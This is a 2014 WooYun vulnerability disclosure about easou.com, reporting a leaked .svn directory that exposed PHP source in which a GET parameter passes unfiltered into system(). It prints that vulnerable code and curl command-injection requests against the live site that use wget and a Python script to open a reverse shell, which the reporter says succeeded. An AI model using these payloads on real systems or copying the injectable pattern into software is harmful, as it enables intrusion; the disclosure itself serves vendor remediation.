当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087818

漏洞标题:宜搜某分站配置不当已被getshell

相关厂商:easou.com

漏洞作者: 米兰的小铁匠

提交时间:2014-12-19 14:51

修复时间:2015-02-02 14:52

公开时间:2015-02-02 14:52

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-19: 细节已通知厂商并且等待厂商处理中
2014-12-19: 厂商已经确认,细节仅向厂商公开
2014-12-29: 细节向核心白帽子及相关领域专家公开
2015-01-08: 细节向普通白帽子公开
2015-01-18: 细节向实习白帽子公开
2015-02-02: 细节向公众公开

简要描述:

某神器扫描到。。。

详细说明:

某神器扫描到 svn地址泄露
http://wall.easou.com/.svn/entries
直接下载源码, 基于yii框架,文件
/protected/controllers/ProController.php

//开发者后台sdk下载(可以改包名)
public function actionGetPackageName2()
{
$packageName='';
$SDKType='';
// $url_base='http://winads.cn:80';
if(isset($_GET['packageName']))$packageName=$_GET['packageName'];
if(isset($_GET['SDKType']))$SDKType=$_GET['SDKType'];
//报名前缀
$filename_list=array(1=>'banner-',2=>'adwall-',3=>'offers-',4=>'alert-',5=>'push-');
$filename=$filename_list[$SDKType].time();
$aid=1;//代理号
// $command_str="/var/lib/jdk1.6.0_22/bin/java -jar /home/ledian/autosdk.jar {$packageName} {$SDKType} {$aid} {$filename}";
// $aa = exec("/usr/bin/id");
// $bb = system($command_str);
// var_dump($aa);
// var_dump($bb);
// system("/home/ledian/autopack.sh {$packageName} {$SDKType} {$aid} {$filename}");
system("/var/www/xyz/site/autopack.sh {$packageName} {$SDKType} {$aid} {$filename}");
$url='http://sdkdown.winads.cn/sdkoutPack/'.$filename.'.zip';
//sdkoutPack
echo '{"state":"OK","url":"'.$url.'"}';
exit;
}


额 system函数未过滤,导致命令注入,直接反弹shell
curl "http://wall.easou.com/index.php?r=pro/getpackagename2&packageName=| wget -O xxx |"
curl "http://wall.easou.com/index.php?r=pro/getpackagename2&packageName=| python /tmp/test.py xxx xxx |"
见漏洞证明吧

漏洞证明:

额,直接反弹shell,反弹shell程序在/tmp/test.py 请自行删除
在机器 /etc/nginx/sites-enabled ls结果如下:麻烦自行检测确认

easou.png


修复方案:

修复命令执行,修复svn泄露

版权声明:转载请注明来源 米兰的小铁匠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-19 14:59

厂商回复:

谢谢指出,我们会及时改正

最新状态:

暂无


漏洞评价:

评论

  1. 2014-12-19 14:56 | azuer ( 普通白帽子 | Rank:127 漏洞数:30 )

    !求神器!

  2. 2014-12-19 15:20 | ddy ( 实习白帽子 | Rank:44 漏洞数:16 | 其实第一次要我挖洞我是拒绝的。因为,你不...)

    !求神器!

  3. 2015-01-10 16:28 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    !求神器!

  4. 2015-01-11 13:01 | 淡蓝色の忧伤 ( 普通白帽子 | Rank:172 漏洞数:26 | 开启审计php代码模式 (⊙v⊙)嗯)

    !求神器!